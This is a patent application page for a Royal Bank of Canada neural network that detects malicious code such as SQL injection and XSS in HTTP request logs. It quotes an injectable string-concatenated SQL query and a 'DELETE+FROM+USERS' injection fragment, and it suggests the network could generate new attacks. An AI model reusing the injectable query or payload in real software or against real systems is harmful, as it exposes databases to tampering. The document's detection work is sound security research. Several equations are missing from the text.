Login| Sign Up| Help| Contact|

Patent Searching and Data


Title:
SYSTEMS AND METHODS FOR MALICIOUS CODE DETECTION
Document Type and Number:
WIPO Patent Application WO/2018/184102
Kind Code:
A1
Abstract:
There is provided a neural network system for detection of malicious code, the neural network system comprising: an input receiver configured for receiving input text from one or more code input sources; a convolutional neural network unit including one or more convolutional layers, the convolutional unit configured for receiving the input text and processing the input text through the one or more convolutional layers; a recurrent neural network unit including one or more long short term memory layers, the recurrent neural network unit configured to process the output from the convolutional neural network unit to perform pattern recognition; and a classification unit including one or more classification layers, the classification unit configured to receive output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code.

Inventors:
SMYTH CATHAL (CA)
FONG CORY (CA)
LUI YIK CHAU (CA)
CAO YANSHUAI (CA)
Application Number:
PCT/CA2018/050408
Publication Date:
October 11, 2018
Filing Date:
April 03, 2018
Export Citation:
Click for automatic bibliography generation   Help
Assignee:
ROYAL BANK OF CANADA (CA)
International Classes:
G06F21/56; G06N3/02; G06N3/04; G06N3/08
Foreign References:
US9705904B12017-07-11
US20150254555A12015-09-10
US9495633B22016-11-15
US20140279779A12014-09-18
US9203854B22015-12-01
US20080184371A12008-07-31
CN105989288A2016-10-05
CN102142068A2011-08-03
CN106096415A2016-11-09
Other References:
SAXE, J. ET AL., EXPOSE: A CHARACTER-LEVEL CONVOLUTIONAL NEURAL NETWORK WITH EMBEDDINGS FOR DETECTING MALICIOUS URLS, FILE PATHS AND REGISTRY KEYS, 27 February 2017 (2017-02-27), XP055540994, Retrieved from the Internet
KOLOSNJAJI, B. ET AL.: "Deep Learning for Classification of Malware System Call Sequences", PROCEEDINGS OF AUSTRALASIAN JOINT CONFERENCE ON ARTIFICIAL INTELLIGENCE, 5 December 2016 (2016-12-05), Hobart, Australia, pages 12, XP055541017
KARPATHY, A. ET AL., VISUALIZING AND UNDERSTANDING RECURRENT NETWORKS, 17 November 2015 (2015-11-17), XP055541028, Retrieved from the Internet
STROBELT, H. ET AL., VISUAL ANALYSIS OF HIDDEN STATE DYNAMICS IN RECURRENT NEURAL NETWORKS, 23 June 2016 (2016-06-23), pages 7, XP055541032, Retrieved from the Internet
LI, J. ET AL., VISUALIZING AND UNDERSTANDING NEURAL MODELS IN NLP, 8 January 2016 (2016-01-08), XP055541036, Retrieved from the Internet
TOBIYAMA, S. ET AL.: "Malware Detection with Deep Neural Network Using Process Behavior", PROCEEDINGS OF IEEE 40TH ANNUAL COMPUTER SOFTWARE AND APPLICATIONS CONFERENCE (COMPSAC 2016), vol. 2, 10 June 2016 (2016-06-10), pages 577 - 582, XP032950816
ZHANG, X. ET AL., CHARACTER-LEVEL CONVOLUTIONAL NETWORKS FOR TEXT CLASSIFICATION, 4 April 2016 (2016-04-04), XP055541045, Retrieved from the Internet
PASCANU, R. ET AL.: "Malware Classification with Recurrent Networks", PROCEEDINGS OF 2015 IEEE INTERNATIONAL CONFERENCE ON ACOUSTICS, SPEECH AND SIGNAL PROCESSING (ICASSP), 19 April 2015 (2015-04-19), Brisbane, QLD, Australia, XP055289828
Attorney, Agent or Firm:
NORTON ROSE FULBRIGHT CANADA LLP (CA)
Download PDF:
Claims:
WHAT IS CLAIMED IS:

1. A neural network system, including one or more processors, configured for detection of malicious code, the neural network system comprising:

an input receiver configured for receiving input text in the form of one or more code samples from one or more code input sources;

a convolutional neural network unit including one or more convolutional layers, the convolutional neural network unit configured for receiving the input text and processing the input text through the one or more convolutional layers to generate a constrained set of one or more features;

a recurrent neural network unit including one or more long short term memory layers, the recurrent neural network unit configured to perform pattern recognition on the constrained set of the one or more features and to generate output data;

a classification unit including one or more classification layers, the classification unit configured to receive the output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code; and a code visualization layer configured to generate a visualization output having one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code.

2. The neural network system of claim 1 , wherein the input receiver is configured to map each character of the one or more code samples to a multi-dimensional vector, and to set a sequence dimension of each code sample to a uniform sample length by padding any remainders with empty vectors, the input receiver generating a |T| x |V| sparse matrix.

3. The neural network system of claim 2, wherein the |T| x |V| sparse matrix is received by the convolutional neural network unit and processed by each of the one or more convolutional layers, each layer including a set of filters, each with length d, which are configured to scan across the

sparse matrix, and

wherein the sparse matrix is iteratively processed through each of the

one or more convolutional layers, and an element-wise product of each filter f and the sparse matrix are passed through a non-linear activation

function

4. The neural network system of claim 3, wherein a rectified linear unit provides the non-linear activation function φ and utilized to discard any negative values, and to retain all positive values, and the |T| x |V| sparse matrix is iteratively processed through each of the one or more convolutional layers to reduce a size of data being analyzed at each iteration.

5. The neural network system of claim 4, wherein the recurrent neural network unit includes a bi-directional long short term memory network including at least an input gate and a forget gate, the input gate configured using the relation:

, and the forget gate configured using the relation: wherein Wf and Uf are weight matrices, where xt is a single time step from a sequence is information from a previous state, bf are bias

vectors and σ is a sigmoid function having the relation:

6. The neural network system of claim 5, wherein during training of the neural network system, dropout is applied to randomly switch off one or more hidden units of the neural network system.

7. The neural network system of claim 6, wherein the convolutional neural network unit is configured to apply batch normalization on intermediate outputs after processing of the |T| x |V| sparse matrix by each of the one or more convolutional layers.

8. The neural network system of claim 7, wherein the batch normalization includes scaling and shifting each batch of the sparse matrix, and then

causing each batch to a same shared mean (β) and variance (γ), based on the

wherein u, is the batch mean.

9. The neural network system of claim 8, wherein the classification unit is

configured to utilize a binary cross-entropy measure having a loss function for a given set of parameters Θ that is given by the relation:

, wherein represents a probability distribution of a ground truth, while is a probability distribution of the neural network system.

10. The neural network system of claim 8, wherein one or more weights of the

classification unit are updated using a stochastic gradient descent (SGD) having the relation: wnerein η is the learning rate.

11. A computer implemented method implemented on one or more processors configured for detection of malicious code, the method comprising:

receiving input text in the form of one or more code samples from one or more code input sources;

receiving, on a convolutional neural network unit including one or more convolutional layers, the input text;

processing the input text through the one or more convolutional layers to generate a constrained set of one or more features;

performing, on a recurrent neural network unit including one or more long short term memory layers, pattern recognition on the constrained set of the one or more features and to generate output data;

receiving, on a classification unit including one or more classification layers, the output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code; and generating a visualization output having one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code.

12. The method of claim 11 , including mapping each character of the one or more code samples to a multi-dimensional vector, and setting a sequence dimension of each code sample to a uniform sample length by padding any remainders with empty vectors to generate a |T| x |V| sparse matrix.

13. The method of claim 12, wherein the |T| x |V| sparse matrix is received by the convolutional neural network unit and processed by each of the one or more convolutional layers, each layer including a set of filters, each with length d, which are configured to scan across the sparse matrix,

and

wherein the |T| x |V| sparse matrix is iteratively processed through each of the one or more convolutional layers, and an element-wise product of each filter f* and the |T| x |V| sparse matrix are passed through a non-linear activation function φ.

14. The method of claim 13, wherein a rectified linear unit provides the non-linear activation function φ and configured to discard any negative values, and to retain all positive values, and the |T| x |V| sparse matrix is iteratively processed through each of the one or more convolutional layers to reduce a size of data being analyzed at each iteration.

15. The method of claim 14, wherein the recurrent neural network unit includes a bi-directional long short term memory network including at least an input gate and a forget gate, the input gate configured using the relation:

, and the forget gate configured using the relation:

wherein Wf and Uf are weight matrices, where xt is a single time step from a sequence is information from a previous state, bf are bias

vectors and σ is a sigmoid function having the relation:

16. The method of claim 15, wherein during training of the neural network method, dropout is applied to randomly switch off one or more hidden units of the neural network method.

17. The method of claim 16, wherein the convolutional neural network unit is

configured to apply batch normalization on intermediate outputs after processing of the |T| x |V| sparse matrix by each of the one or more

convolutional layers.

18. The method of claim 17, wherein the batch normalization includes scaling and shifting each batch X, of the |T| x |V| sparse matrix, and then causing each batch to a same shared mean (β) and variance (γ), based on the relation:

wherein u, is the batch mean.

19. The method of claim 18, wherein the classification unit is configured to utilize a binary cross-entropy measure having a loss function for a given set of parameters Θ that is given by the relation:

, wherein represents a probability distribution of a ground truth, while is a probability distribution of the neural network.

20. A computer readable medium, storing machine interpretable instructions, which when executed on one or more processors configured for detection of malicious code cause the one or more processors to perform steps of a method comprising:

receiving input text in the form of one or more code samples from one or more code input sources;

receiving, on a convolutional neural network unit including one or more convolutional layers, the input text;

processing the input text through the one or more convolutional layers to generate a constrained set of one or more features; performing, on a recurrent neural network unit including one or more long short term memory layers, pattern recognition on the constrained set of the one or more features and to generate output data;

receiving, on a classification unit including one or more classification layers, the output data from the recurrent neural network unit to perform a

determination of whether the input text or portions of the input text are malicious code or benign code; and generating a visualization output having one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code.

Description:
SYSTEMS AND METHODS FOR MALICIOUS CODE DETECTION

CROSS REFERENCE

[0001] This application is a non-provisional of, and claims all benefit of, including priority to, United States Patent Application No. 62/480,856, dated 03-Apr-2017 entitled: SYSTEMS AND METHODS FOR MALICIOUS CODE DETECTION, incorporated herein by reference.

FIELD

[0002] The present disclosure generally relates to the field of cybersecurity, and more particularly, to using deep learning for malicious code detection / generation.

INTRODUCTION

[0003] Cybersecurity is an increasingly difficult challenge organizations face in protecting computing systems and safeguarding data.

[0004] A survey of 12 countries reported that in 2016 over 280,000 records were breached at an average cost of $158 per record. Indirect costs such as reputational risk leads to customer churn and in turn greater financial losses. The majority of these breaches are caused by malicious actions including malware infections and SQL injections. To counter such exploits, host-based intrusion detection systems (HIDS) are employed. However, current detection methodologies are heuristic-driven, slow, and often inaccurate. In a worst case scenario, misclassification can lead to data breaches and/or catastrophic loss of data. In the best case, it can lead to false positives, resulting in labor-intensive re-classification and ad-hoc rule addition to heuristic algorithms.

[0005] Host-based intrusion detection systems (HIDS) are challenging to engineer, requiring rapid classification while maintaining high levels of precision and recall. To date, most HIDS are heuristic, inaccurate, and are straining to cope with the increasing volume of maljcious attacks occurring globally.

[0006] Most approaches to malicious code detection are rule based. These rules are generated by security experts who have observed system vulnerabilities and then seek to find some general rules that detect such vulnerabilities. The problem is that it can be difficult, if not impossible to cover every edge case of an attack in a computationally efficient manner. This is because rule sets create linear boundaries that can often be circumvented.

[0007] Moreover, as the variety of attacks grows, so does the rule set. This increase in rule complexity will see a serious lag in compute time, and as the number of automated attacks increase, issues of scalability and accuracy come in to play.

SUMMARY

[0008] In Natural Language Processing (NLP), early technical attempts to process language using hand-crafted features and rule-based methods were met with limited success. Recently, the application of deep learning to the field of NLP has led to performance leaps in areas such as speech recognition, text classification, summarization and machine translation.

[0009] As described herein or otherwise, in some scenarios, deep learning techniques may be effective in processing computer code in applications such as malicious code detection. Malicious code, like all code, is a form of language having concepts such as grammar and context, but has its own idiosyncrasies built in.

[0010] In some embodiments, the present disclosure describes a system which utilizes deep learning architectures to detect malicious code as an (unnatural) language processing problem. In some embodiments, the system is configured based on the structure and particularities of software language.

[0011] As described in various embodiments, malicious code detection is approached from a language perspective, by using Natural Language Processing (NLP) to classify code. To this end, Applicants have developed systems, methods, devices, and computer readable media implementing a deep learning model that can detect malicious code with human- expert level precision and at speeds that may be orders of magnitudes faster than humans. [0012] The system is directed to improving security and privacy, intrusion detection, improved computers and computing techniques, using natural language processing and neural networks. A practical, tangible system is described that, in some embodiments, is a special purpose device that is adapted for placement or interconnection with a computing infrastructure, such as a data center. In a specific embodiment, the special purpose device is a hardware appliance including a neural network stored in local or connected in cloud storage, which is used to parse code during development, compilation, debugging, or review, such that decision support interface elements are rendered (e.g., overlaid) in relation to source code or object code elements. The hardware appliance can be miniaturized and provided in conjunction with (or within) a personal computer or mobile tablet platform for providing real or near-real time feedback as code segments are provided to the hardware appliance.

[0013] The structure of the neural network is described, as well as its application to a corpus of malicious and benign code. A method of visualizing the neural network's decision process is also presented. A novel, fast and easy to train neural network that can classify malicious and benign code with human-expert level accuracy is described. In some embodiments, an end-to-end supervised learning approach is described that utilizes a specialized computer system configured to process code inputs and is trained in binary classification. The system is configured to utilize techniques from deep learning. [0014] Convolutional Neural Network (CNN) layers are used for pattern detection and compression, while Recurrent Neural Network (RNN) layers help with memory and context. Various re-parametrization and regularization techniques such as dropout and batch- normalization are also discussed. The system is tested against a dataset of 50,000 labeled server logs, and results are compared against the performance of a human expert as well as a penetration testing software. Experimental results are provided in the sections below.

[0015] Visualizations of the "thought process" of the neural network using a selection of malicious examples are provided. This serves to illustrate the breadth and precision of the neural network's detection capabilities. [0016] In accordance with an aspect, there is provided a neural network system, including one or more processors, configured for detection of malicious code, the neural network system comprising: an input receiver configured for receiving input text in the form of one or more code samples from one or more code input sources; a convolutional neural network unit including one or more convolutional layers, the convolutional neural network unit configured for receiving the input text and processing the input text through the one or more convolutional layers to generate a constrained set of one or more features; a recurrent neural network unit including one or more long short term memory layers, the recurrent neural network unit configured to perform pattern recognition on the constrained set of the one or more features and to generate output data; a classification unit including one or more classification layers, the classification unit configured to receive the output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code; and a code visualization layer configured to generate a visualization output having one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code.

[0017] In accordance with another aspect, the input receiver is configured to map each character of the one or more code samples to a multi-dimensional vector, and to set a sequence dimension of each code sample to a uniform sample length by padding any remainders with empty vectors, the input receiver generating a sparse matrix.

[0018] In accordance with another aspect, the sparse matrix is received by the convolutional neural network unit and processed by each of the one or more convolutional layers, each layer including a set of filters, each with length d, which are configured to scan across the sparse matrix, and wherein the sparse matrix is iteratively processed through each of the one or more convolutional layers, and an element-wise product of each filter and the sparse matrix are passed through a

non-linear activation function

[0019] In accordance with another aspect, a rectified linear unit provides the non-linear activation function φ and utilized to discard any negative values, and to retain all positive values, and the |T| x |V| sparse matrix is iteratively processed through each of the one or more convolutional layers to reduce a size of data being analyzed at each iteration.

[0020] In accordance with another aspect, the recurrent neural network unit includes a bidirectional long short term memory network including at least an input gate and a forget gate, the input gate configured using the relation:

, and the forget gate configured using the relation:

wherein W f and U f are weight matrices, where x t is a single time step from a sequence is information from a previous state, b f are bias vectors

and σ is a sigmoid function having the relation:

[0021] In accordance with another aspect, during training of the neural network system, dropout is applied to randomly switch off one or more hidden units of the neural network system.

[0022] In accordance with another aspect, the convolutional neural network unit is configured to apply batch normalization on intermediate outputs after processing of the |T| x |V| sparse matrix by each of the one or more convolutional layers.

[0023] In accordance with another aspect, the batch normalization includes scaling and shifting each batch X, of the |T| x |V| sparse matrix, and then causing each batch to a same e (γ), based on the relation:

wherein u, is the batch mean.

[0024] In accordance with another aspect, the classification unit is configured to utilize binary cross-entropy measure having a loss function for a given set of parameters Θ that given by the relation:

, wherein p represents a probability distribution of a ground truth, while q is a probability distribution of the neural network system.

[0025] In accordance with another aspect, one or more weights of the classification unit are updated using a stochastic gradient descent (SGD) having the relation: wherein η is the learning rate.

[0026] In accordance with an aspect, there is provided a neural network system for detection of malicious code, the neural network system comprising an input receiver configured for receiving input text from one or more code input sources; a convolutional neural network unit including one or more convolutional layers, the convolutional unit configured for receiving the input text and processing the input text through the one or more convolutional layers; a recurrent neural network unit including one or more long short term memory layers, the recurrent neural network unit configured to perform pattern recognition; and a classification unit including one or more classification layers, the classification unit configured to receive the output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code.

[0027] In accordance with another aspect, the neural network system further includes a code visualization layer configured to generate a visualization output having one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code.

[0028] In accordance with another aspect, the code visualization layer is configured to overlay the one or more visual interface elements indicative of the input text or the portions of the input text that are identified as malicious code over with the input text. [0029] In accordance with another aspect, the convolutional neural network unit includes at least two convolutional layers having different strides.

[0030] In accordance with another aspect, the convolutional neural network unit includes three convolutional layers.

[0031] In accordance with another aspect, the convolutional neural network unit includes a first convolutional layer having a stride of 1 ; a second having a stride of 2; and a third convolutional layer having a stride of 2.

[0032] In accordance with another aspect, the convolutional neural network unit includes three convolutional layers.

[0033] In accordance with another aspect, the recurrent neural network unit includes at least a long short term memory unit.

[0034] In accordance with another aspect, the recurrent neural network unit is bidirectional.

[0035] In accordance with another aspect, the convolutional neural network unit is configured to perform dropout and batch normalization to intermediate output generated at each of the one or more convolutional layers. [0036] In various further aspects, the disclosure provides corresponding systems and devices, and logic structures such as machine-executable coded instruction sets for implementing such systems, devices, and methods.

[0037] In this respect, before explaining at least one embodiment in detail, it is to be understood that the embodiments are not limited in application to the details of construction and to the arrangements of the components set forth in the following description or illustrated in the drawings. Also, it is to be understood that the phraseology and terminology employed herein are for the purpose of description and should not be regarded as limiting.

[0038] Many further features and combinations thereof concerning embodiments described herein will appear to those skilled in the art following a reading of the instant disclosure.

DESCRIPTION OF THE FIGURES

[0039] In the figures, embodiments are illustrated by way of example. It is to be expressly understood that the description and figures are only for the purpose of illustration and as an aid to understanding.

[0040] Embodiments will now be described, by way of example only, with reference to the attached figures, wherein in the figures:

[0041] FIG. 1 A is an illustration of a single 1 D CNN filter, with receptive field d = 3 and stride s = 2 scanning over a string of text for 3 steps, according to some embodiments. [0042] FIG. 1 B is an example text snippet from a server log, according to some embodiments.

[0043] FIG. 2 is an example code snippet with potential malicious code highlighted, according to some embodiments.

[0044] FIG. 3A is an illustration of a malicious code neural network, according to some embodiments. [0045] FIG. 3B is an example neural network data flow diagram, according to some embodiments.

[0046] FIG. 3C is a block schematic diagram of an example system, according to some embodiments. [0047] FIG. 4 is an example text snippet with potential malicious code highlighted, according to some embodiments.

[0048] FIGS. 5, 6A, 6B, 7A, 7B and 8 illustrate example code, according to some embodiments.

[0049] FIG. 9 is an example code snippet of training data, in the form of a GET, according to some embodiments.

[0050] FIG. 10 is an example code snippet of training data, in the form of a POST, according to some embodiments.

[0051] FIG. 11 is an accuracy / speed chart, according to some embodiments.

[0052] FIG. 12 is high level drawing of a neural network. [0053] FIG. 13 is a pictorial example of image recognition using concurrent neural networks.

[0054] FIG. 14 is an example text snippet illustrating features of recurrent neural networks.

[0055] FIG. 15 is example pseudo-code illustrating function calls for an implementation of a neural network, according to some embodiments.

[0056] FIGS. 16 and FIG. 17 are example screenshots of a visualization, according to some embodiments. The darker the font the more important the system identifies the text to be. [0057] FIG. 18 is a visual illustration of an attention model that may be used in some configured neural networks, according to some embodiments.

[0058] FIG. 19 is an example computing system, according to some embodiments.

[0059] FIGS. 20A, 20B, and 20C are examples of a SQL injection, represented by hidden nodes from 3 different layers, according to some embodiments.

[0060] In FIG. 20A, the hidden node from the first CNN layer is quite noisy. It picks out some useful words, but also plenty of irrelevant information. The hidden node in the third CNN layer, shown in FIG. 20B is more focused on an aspect of the SQL injection, while for the most part ignoring the rest of the text. Finally the hidden node in the RNN layer FIG. 20C captures the full SQL injection. The darker the font the more important the system identifies the text to be.

[0061] FIG. 21 is an example output of a hidden node activating when it encounters an attack that is double-encoded, according to some embodiments. The intended payload will be fully decoded at the web server, unless it is stopped at a security layer. If the security layer only decodes the input once, the payload will still get through. The darker the font the more important the approach has estimated the text to be.

[0062] FIG. 22 is an illustration of an example cross site scripting (XSS) attack detected by a neural network of some embodiments, where a hidden unit in the last layer is firing while reading the attack. The darker the font the more important the approach has estimated the text to be.

[0063] FIG. 23 is an illustration of an example of a session hijacking via a forged cookie injection. The darker the font the more important the approach has estimated the text to be.

[0064] FIG. 24 is an illustration where the hidden unit has detected a command injection attack, according to some embodiments. In FIG. 24, the attacker is attempting to delete the entire /etc/passwd directory. [0065] FIG. 25 is an illustration of a misclassification by the neural network. In this case the system falsely returned a negative on a data probe attempt.

DETAILED DESCRIPTION

[0066] Embodiments of methods, systems, and apparatus are described through reference to the drawings.

[0067] The following discussion provides many example embodiments of the inventive subject matter. Although each embodiment represents a single combination of inventive elements, the inventive subject matter is considered to include all possible combinations of the disclosed elements. Thus if one embodiment comprises elements A, B, and C, and a second embodiment comprises elements B and D, then the inventive subject matter is also considered to include other remaining combinations of A, B, C, or D, even if not explicitly disclosed.

[0068] In some embodiments, systems, methods, and computer-readable media are provided for implementing malicious code detection using deep learning techniques, among others. Malicious code detection is a challenge that has become prevalent in the modern, electronic signal-driven world, especially after the proliferation of internet and communications technologies.

[0069] Malicious code detection is a problem that arises in view of technological improvements, that exists on a massive scale. It is not a human-based problem, nor does a human-based solution exist. As such, a sufficient technological response is needed, and the computer-implemented systems and methods described below are capable of classifying malicious code in a variety of forms.

[0070] A wider volume of increasingly sophisticated attacks are barraging databases at an ever increasing rate. A 2016 survey of 12 countries reported that over 280,000 records were breached at an average cost of $158 per record. Indirect costs such as reputational risk leads to customer churn and, in turn, greater financial losses. A significant proportion of these breaches are caused by malicious actions including, for example, malware infections and SQL injections (e.g., statement = "SELECT * FROM users WHERE name = '" + userName + "';")·

[0071] To counter such exploits, Host-based Intrusion Detection Systems (HIDS) are employed. However, current detection methodologies are heuristic driven, slow, and often inaccurate. In a worst case scenario, inaccurate classification can lead to data breaches and/or catastrophic loss of data. In the best case, it can lead to false positives, resulting in labour-intensive re-classification and ad-hoc rule addition to classification algorithms. The underlying issue is that malicious code, like all code, is a language. Previous algorithmic attempts to process language using hand-crafted features and rule-based methods have met with limited success.

[0072] Applicant has undergone extensive cybersecurity research, including collaborations with two universities and an international business services / computing company, using security audit information to conduct validation and accuracy testing.

[0073] Applicants sought to develop methods and systems that, when trained with sufficient data, can quickly and accurately detect malicious code with around or above human level precision.

[0074] A neural network is trained on a corpus of benign and malicious code (e.g., ~50,000 samples both malicious and benign). The approach involves representation learning. Using a sufficient large and varied training set, a neural network is configured to perform a non-linear projection of the space of benign and malicious code, and form an accurate decision boundary.

[0075] No rules need to be created. In fact, instead of an ever increasing rule set, one simply retrains the model with new examples of attacks. In essence, the neural network learns aspects of the language. The neural network learns patterns or phrases that are considered malicious, and can remember where in the sequence these patterns appear.

[0076] Experimental results have indicated that this approach is also significantly more accurate. Using the same test data set, a configured neural network scored 99% in precision, recall and accuracy, while an out-of-the-box heuristic model scored 66%, 43% and 64% respectively. Experimental results have indicated that the approach is also faster, for example, a configured system using a GPU implementation can process -1500 examples in a second, vs 800/s for the out-of-the-box model. One could increase the accuracy of the out-of-the-box model by adding more rules, but it would drop the speed down to tens of samples per second. In implementation, the neural network can be added as a security layer that processes any user request before passing it to the server. The small size of the network means it can be easily run on a modern machine. Moreover, in some embodiments, the system is parallelized: a GPU implementation is possible and can lead to speed increases.

[0077] The system may also be utilized to discover new attack vectors. Consider a variety of new attacks. Amongst them were several attacks with a new common exploit, though it wasn't clear what it was exploiting. One could train the neural network with these examples, and it can highlight the point that it found to be anomalous. Finally it can be used for to generate new attacks for penetration testing.

[0078] As noted above, in some embodiments, the neural network may, for example, be able to work in reverse and generate malicious code. The specific combination of data processing steps performed on a per-character basis in combination with machine learning applied specifically to malicious Internet traffic is innovative. The approach, for example, for purposes of penetration testing, can be trained to generate new code that may or may not be malicious. If the neural network determines it is malicious, the neural network is rewarded. Over time, the system can possibly learn new attacks that could exploit software, alerting a developer to vulnerabilities prior to launch.

[0079] The system may be used to achieve various objectives such as providing a neural network configured to detect malicious code by processing input training samples, providing a neural network configured to predict potential attacks based on a series of probes, and potentially generate effective / probable attacks to test application vulnerability and uncover potential zero-day vectors. [0080] Deep learning approaches are helpful in the field of cyber-security, and various approaches have been taken to use neural networks to categorize intrusion detection data based on various features, and from a language perspective, a prior approach has been taken to use word embedding and neural networks to model system-call language and design an anomaly-based host based intrusion detection system (HIDS).

[0081] However, no work, to Applicants' knowledge, is using deep learning and NLP to classify code as benign or malicious. A neural network, described in various examples and embodiments, was modelled on that employed in for the purpose of classifying text documents. A method is provided that is used for classifying malicious code. [0082] In this approach, code is considered from the perspective of a language. Code is the product of human ingenuity and, along with concepts such as grammar and context, code has its own idiosyncrasies built in. As such, no rule-based system can fully process this language.

[0083] Recently, the application of deep learning to the field of Natural Language Processing has led to performance leaps in areas such as speech recognition, text classification, summarization and machine translation.

[0084] A potential approach therefore, is to treat malicious code detection as an (Unnatural) Language Processing problem, and apply deep learning methods to form a solution. As described in various embodiments, an innovative, fast and easy to train neural network that can classify malicious and benign code is provided, and in some embodiments, the neural network is found to have around or above human-expert level accuracy.

[0085] The supervised-learning approach is described, along with the selection method around how to determine an appropriate set of features. A strength of deep learning is that it automatically learns representations; as information passes through deeper and deeper layers, more complex features are learned. The method uses several state-of-the-art techniques from deep learning.

Neural Networks [0086] A neural network may include, for example, three layers: an input layer, a hidden layer and an output layer. The hidden layer is a linear combination of the input x and a bias (e.g., z=Wx+b). A sample neural network diagram 1200 is shown at FIG. 12. These neurons are then activated via some nonlinearity (e.g., a= tanh (z)). The output layer is configured to generate an assessment of input layer (e.g., Dog/Cat), and errors are corrected via back propagation.

[0087] Convolutional Neural Networks are typically used with images (e.g., image classification), and CNNs scan across an image with filters that pick out different patterns, for example, as shown in the example 1300 of FIG. 13. Each successive layer picks out more complex patterns, and CNNS can be used for also be used for natural language processing.

[0088] Recurrent neural networks are configured to process with sequenced data (e.g., time series or text), and the hidden state of an RNN may be updated with the latest data point along with a history of all previous data points. The RNN has a memory of past events, and this may be particularly useful in NLP when relevant text is in different parts of a sample. There are different flavours of RNN such as LSTM and GRU. As an example, FIG. 14 is a sample text block 1400 that shows where relevant text 1402, 1404 are in different portions of the text block 1400.

[0089] The system and method of some embodiments provides a malicious code detection / generation neural network where malicious code detection / generation is treated as a Natural Language Processing (NLP) problem.

[0090] In accordance with some embodiments, code is analyzed on a per character level, and provided into a sequence of 3 CNN layers. Features are provided as inputs into a bidirectional LSTM (RNN), and the final output declared Malicious/Safe. [0091] The Convolutional Neural Network (CNN) layers are used for pattern detection and compression, while the RNN helps with memory and context. Various regularization techniques such as batch-normalization and dropout are also employed. In order to interpret how the algorithm makes its decisions, it is important to understand how the neural network is "thinking". A visualization technique is developed, illustrating the similarity between the thought processes of humans and neural networks.

[0092] On a fundamental level, malicious code is an computer-based exploit of computer operations. As sudh, it is in essence a computer-based problem. Malicious code detection is also a classic big data problem. Each day, a larger volume of a wider variety of malicious code is attacking platforms with greater velocity. Current detection methodology is heuristic driven, with high false positive rates that then require human intervention at the cost of many man hours. [0093] The approach of some embodiments was found to be particularly effective at detecting cross-site scripting and SQL injection attacks. Experimental results indicate that there may be potential for 98% accuracy rate, as shown in some experiments for some specific scenarios. While new attacks could be detected using this system, if there is an entirely new attack vector for which the neural network has no training, there may be a lower likelihood of detection.

[0094] The specific corpus of data used in Applicants' experiments was a collection of http request logs, obtained during security audits at various educational institutions and businesses, among other locations. An example http request 100 is provided in FIG. 1 B.

[0095] Within the malicious code data set, there may be, for example, instances of SQL injection (SQLi) and Cross-Site Scripting (XSS). An example 200 of SQLi can be seen in FIG. 2, where, for example, an authorization deletion is being attempted. The SQLi is shown in the highlight (DELETE+FROM+USERS).

Model Design

[0096] To detect malicious code, the system is configured to implement deep learning methods that are employed in Natural Language Processing (NLP). The samples were read individually on a per-character basis. There was, in this example, a vocabulary of 80 characters and a sequence length of 1300 characters. Shorter samples were padded with zeros to the length of the longest sample.

[0097] The neural network architecture includes three types of layers: convolutional layers, recurrent layers and a classification layer. Before input, the text is converted into a 1300 x 80 matrix, where the ith row represents the ith letter of the sample, and each column is of value 0, except for the column that represents the character, which has value 1. This is known as one-hot encoding.

[0098] Beginning with the input of a sequence of one-hot encoded vectors

a convolutional layer is applied, resulting in a new set of feature vectors

of size |F|, and with sequence length T'. At this point batch normalization and dropout can be applied, resulting in a regularized output More convolutional layers can be applied, along with regularization, as needed. Next, a bidirectional LSTM is employed resulting in two hidden state vectors each with dimension equivalent to the number

of LSTM hidden states. Finally, these features are provided into a classification layer, in this case a sigmoid function.

[0099] FIG. 1A is an illustration of a single 1 D CNN filter, with receptive field d = 3 and stride s = 2 scanning over a string of text for 3 steps. The letters here are visual representations of their one-hot encoded form. Each filter assigns a (+/-) weight to each of the 3 letters that it scans in a given time step, then adds them together before passing the value through a nonlinear function

[00100] The 1 D convolutional layer applies a filter of sequence length n (in this case length 7) that scans across the sample and returns a value for each step. The filter, in some embodiments, is essentially a vector of 7 values that perform a basic linear regression on the input before being passed through a non-linear activation. In this example, the non-linear activation is a rectified linear unit (ReLu) that keeps the value if positive, and sets it to zero if negative. As the network is trained, the filter values are updated so that they are more effective at identifying and/or determining patterns. [00101] Another feature of convolutional layer filters is that they can have a stride: meaning how many letters it skips before applying the filter again. This has the added benefit of compressing data and reducing computational complexity. Three convolutional layers may be used: one with stride 1 , and two with stride 2. After each convolutional layer, the system is configured to apply dropout and batch normalization. Dropout randomly switches off some filters during training. This prevents a model from relying on some filters more than others as this can lead to over-fitting.

[00102] Batch-normalization is a sound application of statistics to normalize the data that is being processed in batches. Following the convolutional layers, the system applies a bi- directional Recurrent layer, specifically a Long Short Term Memory (LSTM) layer. An LSTM has the ability to act like a normal neural network (passes the sample data through a linear function, then a non-linear activation) and then remember the output of that function when the next sample comes along. The LSTM then has memory of all past text that it processed, and because the LSTM is bidirectional, the LSTM has memory of all future text too. This may be useful when dealing with long sequences (e.g., 1300 characters).

[00103] The last layer in the network is the classification layer. In some embodiments, the classification layer is configured as a single neuron that determines whether or not the code is malicious, based on the input of all the cells from the LSTM. In training the neural network, the system may be configured to optimize the cost function. In other words, the system is configured to minimize how wrong the algorithm is for a given set of weights (the values that make up the filters and cells of the convolutional and recurrent layers).

[00104] Stochastic gradient descent using Adam™ as an optimizer can be performed. FIG. 3 is an illustration of the flow of data 300 in this particular neural network.

